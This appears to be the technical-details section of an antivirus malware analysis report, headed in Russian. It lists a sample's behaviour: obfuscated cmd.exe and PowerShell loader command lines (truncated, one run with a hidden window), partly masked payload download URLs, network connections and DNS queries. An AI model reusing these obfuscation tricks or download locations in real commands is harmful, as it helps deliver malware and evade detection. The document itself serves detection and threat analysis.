Техническая информация
- '<SYSTEM32>\cmd.exe' bMtWEQVWRKr wsrapKojMzwzLFuDMMfZcJUGq OiRBQjKqwSYUYQ & %C^om^S^pEc% %C^om^S^pEc% /V /c set %iSilHuSFFOPzAPM%=mCPFniamWPz&&set %var1%=p&&set %var2%=ow&&set...
- 'ga##rl.it':80
- 'ga##rl.it':443
- 'ci##ly.it':80
- 'pa####g.nidoma.com':443
- 'ed##omp.ru':80
- http://ga##rl.it/3Vid/
- http://www.ci##ly.it/qHQvlD/
- http://ed##omp.ru/HBmmyF/
- 'ga##rl.it':443
- 'ci##ly.it':443
- DNS ASK ag###ogsa.com
- DNS ASK ga##rl.it
- DNS ASK ci##ly.it
- DNS ASK pa####g.nidoma.com
- DNS ASK sa##r.ru
- DNS ASK ed##omp.ru
- '<SYSTEM32>\cmd.exe' bMtWEQVWRKr wsrapKojMzwzLFuDMMfZcJUGq OiRBQjKqwSYUYQ & %C^om^S^pEc% %C^om^S^pEc% /V /c set %iSilHuSFFOPzAPM%=mCPFniamWPz&&set %var1%=p&&set %var2%=ow&&set...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ([RUNTimE.inTEropSErvIceS.mArSHAl]::ptrTOStRiNgUNi([ruNtIMe.InTERopsERVICes.mArshAL]::sEcurESTRiNGToglObAlALLOcuNIcODE( $('76492d1116743f0423413b16050a5345MgB8AGoAbABhADEAVwArAEkANAA1AFoAagA2...